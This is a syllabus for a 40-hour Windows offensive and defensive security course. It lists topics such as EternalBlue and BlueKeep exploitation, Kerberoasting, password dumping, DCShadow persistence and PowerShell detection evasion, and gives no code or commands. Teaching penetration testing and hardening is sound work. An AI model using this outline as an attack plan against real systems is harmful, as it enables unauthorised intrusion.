Windows Exploitation


Microsoft Windows is one of the most popular operating systems ever used. This operating system can be found on any device, such as computers, phones, banking machines, and many more. In this training, you will learn about Windows operating system, and you will experience in both offensive and defensive methods, knowing how to break into the system is not the same as understanding how to defend against the attack . Students will learn the latest hacking methodologies and use of different attack methods on the various Windows operating systems and Windows applications, and on the other side, how to defend against them.

Duration: 40 Hours

Target Audience
• Penetration testers for Windows environments
• Security professionals and vendors
• System and network administrators
• IT professionals

• ThinkCyber Level-2 Courses

• Getting to know Windows environment
• Discovering vulnerabilities in various Windows operating systems
• Taking advantage of vulnerabilities
• Explore multiple attacks and how to defend against them
• Hardening and securing windows OS



Module 1: Windows OS Concepts

In this module, students will learn about Windows operating systems in general, system management, folder structure, and the concept of exploitation.

  • Windows Fundamental Components
    • Common Windows Versions
    • Domain vs. Workgroup Environment
    • System Built-in Services
    • Network Configurations
  • Internet Connection State (Public or Private)
    • Security Components
  • The Windows-Firewall
  • Windows Defender
  • Antimalware Scan Interface (AMSI)
  • Local Security Policy
    • CMD and Batch Scripting
    • Windows Server Concepts

Module 2: Windows Environment Exploitation

Windows systems are vulnerable and have many security breaches. It is the lack of knowledge of the average user regarding security. The flaws found from time to time in the operating system and the various types of software installed on it, is causing Windows to be a lucrative target, so hackers can take advantage of this and use it to manipulate the user and succeed in his malicious actions. In this module, we will exploit Windows through various methods.

  • Gathering Information
    • Enumerating Windows Services
  • SMB
  • LDAP
  • Kerberos
  • IIS
  • NetBIOS
  • RPC
    • Domain Enumeration
  • Attacking the Host
    • Basic Metasploit Modules
    • Preforming Known Exploits
  • BlueKeep
  • EternalBlue
    • Cross Forest Attacks Using Domain Trust
    • Macro and Hardware-Based Attacks
    • Post exploitation Phase
  • Domain Privilege Escalation using DNSAdmin
  • Kerberos Ticket Harvesting and Kerberoasting
  • Dumping Passwords from the Memory
  • Lateral Movement Throughout the Domain
  • Domain Persistence using DCShadow

Module 3: Offensive PowerShell

PowerShell is a Built-in shell, available on every supported version of Microsoft Windows, and provides incredible flexibility & functionality to manage the Windows system. In this module, we’ll learn various techniques to use PowerShell as a Red-Team tool in Windows environment, and how to understand and leverage this capability of the PS platform to gain and maintain access in this environment.

  • Introduction to PowerShell Scripting
    • What is PowerShell
    • Using ISE, help system, cmdlets, and syntax of PowerShell
    • Scripting Basics
    • Advanced Scripting
  • Working with Pipeline, Files, Functions, Objects, Jobs, and Modules
  • Improving Performances
  • Executing Policies with Scripts
  • Command Injection
  • PowerShell as Offensive Tool
    • Recon and Scanning
  • Gathering Information about the Network
  • Vulnerability Scanning and Analysis
  • Strategies
  • Avoiding Detection
  • Tools Written/Integrated with PowerShell
    • Exploitation
  • Brute Forcing
  • Client-Side Attacks
  • Using Existing Exploitation Techniques
  • Porting Exploits to PowerShell – When and How
  • Human Interface Device
  • Getting Foothold on the System
    • Use Management Tools to Attack Systems
    • Writing Shells in PowerShell
    • Pivoting to other Machines using PowerShell
  • Gaining Control of WinRM and WS-Man Sessions

Module 4: Defense and System Hardening

Microsoft Windows has been the primary target for attacks; thus, it has security measures that can help you prevent and avoid them if possible, such as Windows updates, encryption services, and secure connections. In this module, you will learn how to detect and defend against attacks and breaches, and how to avoid them from the start using Windows features and applications

  • Windows Server Hardening
    • Proper Active-Directory Structure
    • Crafting GPO
  • Blocking App Installation
  • Restricting Access to Command-Lines
  • Registry and Run Access Control
  • Hard-Drive and USB Blocks
    • Patches and WSUS
    • Shared-Folders as Drives
  • Host Hardening
    • DEP – Identifying and Handling Suspicious Files
    • Restricting User’s Environment
  • Block User Desktop
  • Store User-Profile Online
  • Lock Local Users
    • Hardening Network Settings
    • BitLocker and Tamper-Resistance
    • Custom Access-Control
  • System Internals Suite
  • Understanding Event Viewer
  • Sysmon as a Service